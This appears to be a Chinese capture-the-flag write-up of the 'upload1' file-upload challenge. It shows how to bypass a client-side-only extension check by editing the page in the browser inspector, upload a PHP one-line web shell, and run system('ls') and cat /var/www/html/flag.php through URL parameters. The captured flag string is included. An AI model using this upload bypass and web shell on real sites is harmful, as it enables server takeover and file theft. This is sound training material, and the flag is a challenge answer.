攻防世界的里的upload1
点击后的页面
看一下我的一句话木马
明确目标,获取flag
1.判断上传文件漏洞
先传入.php文件,看是否拦截
可以看出,我刚选择我的.php文件就被报错提示了,说明这是前端验证啊!
你看,还不让我上传,上传键还变灰色了
如何判断是否为前端验证?
上传.php文件,立即报错,并且你开了代理,截取不到包,这样妥妥的前端验证,因为前端直接把你的文件进行拦截了嘛
2.解决方法
前端验证,我们用最快的方法,直接修改页面源代码就行(这里建议使用火狐或者谷歌浏览器,我用微软浏览器,修改了也不行)
我们右键,选择检查——产看源代码
查form
删掉 οnchange="check();"
这个语句的意思就是一个事件,当带点击上传的时候触发,至于具体是什么事件,你可以自己看源代码
上传时又提示,我们再进行删除源代码,删除这个disable,点击上传
上传成功后,我们获得路径,现在去调用这个一句话木马
调用方法有很多,我们手动调用,蚁剑好像用不了,他防着的嘞。
2.调用一句话木马
1)手动调用
中间因为个人原因,换了一下一下代码,换成GET了,之前上传成POST了
现在我们测试一下,看上传的文件是否能用,这里我们使用phpinfo();测试,出现下面的图就代表可以使用。
http://61.147.171.105:58114/upload/1683702988.shell(get).php?hack=phpinfo();
我们去看看当前位置有什么文件,用system()函数
http://61.147.171.105:58114/upload/1683702988.shell(get).php?hack=system('ls');
可以看出我传了两次,也可以看出这时linux系统,因为我用的ls
我们去根目录下看看
http://61.147.171.105:58114/upload/1683702988.shell(get).php?hack=system(%27ls%20/var/www/html%27);
看见flag.php文件了吧,打开看看
http://61.147.171.105:58114/upload/1683702988.shell(get).php?hack=system(%27cat%20/var/www/html/flag.php%27);
他是再检查里出现的,右键空白处,检查
flag="cyberpeace{c763321c1ebc2ab91da91506a35736f1}";